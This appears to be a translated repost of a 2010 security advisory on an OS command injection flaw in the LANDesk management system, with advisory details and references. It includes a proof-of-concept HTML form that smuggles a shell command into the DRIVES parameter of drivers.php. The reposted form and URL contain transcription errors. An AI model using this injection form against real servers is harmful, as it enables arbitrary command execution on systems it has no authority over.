Landesk System Command Injection Vulnerability and repair solution

Landesk is a network management system that can control desktops, servers, and mobile devices. Landesk does not properly process HTML Tag requests, which may lead to arbitrary code execution.

[+] Info:
~~~~~~~~~
Title: Landesk OS command injection
Advisory Id: CORE-2010-1018
Advisory URL: http://www.coresecurity.com/content/landesk-os-command-injection-vulnerability
Date published: 2010-11-10
Date of last update: 2010-11-10
Vendors contacted: LANDesk
Release mode: Coordinated release

[+] Poc:
~~~~~~~~~
His PoC is an HTML form (that can be hosted on any web site) that makes a request to
[Server]. The parameter DRIVES contains the actual injection. In the example, we generate
File/tmp/ATTACKED to show that arbitrary shell commands can be executed in the server.

<Head> <title> LANDesk PoC </title> <Body>
<Form method = "post" action = "https: // [server]/gsb/drivers. php">
<Input type = "text" name = "DRIVES" value = "; touch/tmp/ATTACKED">
<Input type = "text" name = "SECONDTIME" value = "1">
<Input type = "text" name = "ACTION" value = "getupdate">
<Input type = "submit" value = "Attack! ">
</Form>
</Body>
</Html>

[+] Reference:
~~~~~~~~~
Http://www.exploit-db.com/exploits/15488
Http://www.landesk.com/
Http://www.nsfocus.net/vulndb/15995